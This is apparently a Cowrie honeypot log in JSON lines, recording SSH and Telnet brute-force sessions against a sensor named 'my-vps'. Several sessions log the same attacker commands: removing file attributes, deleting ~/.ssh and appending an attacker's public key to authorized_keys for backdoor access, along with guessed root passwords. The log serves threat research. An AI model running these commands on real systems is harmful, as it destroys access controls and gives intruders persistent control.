{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.348404Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.398714Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:00:17.596132Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.596641Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.646102Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.646997Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11832,"dst_ip":"1.2.3.4","dst_port":22,"session":"8480118a6812","protocol":"ssh","message":"New connection: 185.152.45.241:11832 (1.2.3.4:22) [session: 8480118a6812]","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.690127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.691168Z","src_ip":"185.152.45.241","session":"8480118a6812"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.739004Z","src_ip":"185.152.45.241","session":"8480118a6812"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.969177Z","src_ip":"185.152.45.241","session":"8480118a6812"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.020101Z","src_ip":"185.152.45.241","session":"8480118a6812"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11881,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b2e3002f051","protocol":"ssh","message":"New connection: 185.152.45.241:11881 (1.2.3.4:22) [session: 8b2e3002f051]","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.064315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.065084Z","src_ip":"185.152.45.241","session":"8b2e3002f051"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.108797Z","src_ip":"185.152.45.241","session":"8b2e3002f051"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.334094Z","src_ip":"185.152.45.241","session":"8b2e3002f051"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.384304Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:00:19.385178Z","src_ip":"185.152.45.241","session":"8b2e3002f051"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16148,"dst_ip":"1.2.3.4","dst_port":23,"session":"42810a81336b","protocol":"telnet","message":"New connection: 115.48.31.119:16148 (1.2.3.4:23) [session: 42810a81336b]","sensor":"my-vps","timestamp":"2025-09-09T03:01:32.064786Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11823,"dst_ip":"1.2.3.4","dst_port":22,"session":"c52acc802254","protocol":"ssh","message":"New connection: 185.152.45.241:11823 (1.2.3.4:22) [session: c52acc802254]","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.469043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.470306Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.528304Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.login.success","username":"root","password":"mujama","message":"login attempt [root/mujama] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.778879Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:01:36.896501Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.897157Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.898257Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:36.953503Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:01:37.140265Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.141009Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.213692Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.214753Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11793,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffb431482e6b","protocol":"ssh","message":"New connection: 185.152.45.241:11793 (1.2.3.4:22) [session: ffb431482e6b]","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.254003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.254807Z","src_ip":"185.152.45.241","session":"ffb431482e6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.303807Z","src_ip":"185.152.45.241","session":"ffb431482e6b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:01:37.569132Z","src_ip":"185.152.45.241","session":"ffb431482e6b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.619256Z","src_ip":"185.152.45.241","session":"ffb431482e6b"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11887,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d0f8ec566fc","protocol":"ssh","message":"New connection: 185.152.45.241:11887 (1.2.3.4:22) [session: 3d0f8ec566fc]","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.663316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.664194Z","src_ip":"185.152.45.241","session":"3d0f8ec566fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.708322Z","src_ip":"185.152.45.241","session":"3d0f8ec566fc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.928537Z","src_ip":"185.152.45.241","session":"3d0f8ec566fc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.979041Z","src_ip":"185.152.45.241","session":"c52acc802254"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:38.980442Z","src_ip":"185.152.45.241","session":"3d0f8ec566fc"}
{"eventid":"cowrie.session.closed","duration":12.578096389770508,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:44.642805Z","src_ip":"115.48.31.119","session":"42810a81336b"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16194,"dst_ip":"1.2.3.4","dst_port":23,"session":"372e45488d86","protocol":"telnet","message":"New connection: 115.48.31.119:16194 (1.2.3.4:23) [session: 372e45488d86]","sensor":"my-vps","timestamp":"2025-09-09T03:01:44.755543Z"}
{"eventid":"cowrie.session.closed","duration":12.78920030593872,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:01:57.544682Z","src_ip":"115.48.31.119","session":"372e45488d86"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16243,"dst_ip":"1.2.3.4","dst_port":23,"session":"bce1b8af7324","protocol":"telnet","message":"New connection: 115.48.31.119:16243 (1.2.3.4:23) [session: bce1b8af7324]","sensor":"my-vps","timestamp":"2025-09-09T03:01:57.825271Z"}
{"eventid":"cowrie.session.closed","duration":12.760586500167847,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:10.585789Z","src_ip":"115.48.31.119","session":"bce1b8af7324"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16292,"dst_ip":"1.2.3.4","dst_port":23,"session":"55d6b5d98eda","protocol":"telnet","message":"New connection: 115.48.31.119:16292 (1.2.3.4:23) [session: 55d6b5d98eda]","sensor":"my-vps","timestamp":"2025-09-09T03:02:10.745624Z"}
{"eventid":"cowrie.session.closed","duration":12.789207696914673,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:23.534764Z","src_ip":"115.48.31.119","session":"55d6b5d98eda"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16351,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed59aec47d5e","protocol":"telnet","message":"New connection: 115.48.31.119:16351 (1.2.3.4:23) [session: ed59aec47d5e]","sensor":"my-vps","timestamp":"2025-09-09T03:02:23.798426Z"}
{"eventid":"cowrie.session.closed","duration":12.787947654724121,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:36.586285Z","src_ip":"115.48.31.119","session":"ed59aec47d5e"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16409,"dst_ip":"1.2.3.4","dst_port":23,"session":"e047793322b9","protocol":"telnet","message":"New connection: 115.48.31.119:16409 (1.2.3.4:23) [session: e047793322b9]","sensor":"my-vps","timestamp":"2025-09-09T03:02:36.729622Z"}
{"eventid":"cowrie.session.closed","duration":12.82026720046997,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:49.549801Z","src_ip":"115.48.31.119","session":"e047793322b9"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16471,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ea3e1784bc2","protocol":"telnet","message":"New connection: 115.48.31.119:16471 (1.2.3.4:23) [session: 8ea3e1784bc2]","sensor":"my-vps","timestamp":"2025-09-09T03:02:49.743996Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11889,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eec796171d9","protocol":"ssh","message":"New connection: 185.152.45.241:11889 (1.2.3.4:22) [session: 7eec796171d9]","sensor":"my-vps","timestamp":"2025-09-09T03:02:54.914172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:02:54.915087Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:02:54.968606Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.login.success","username":"root","password":"zaq123","message":"login attempt [root/zaq123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.218718Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:02:55.378636Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.379377Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.380532Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
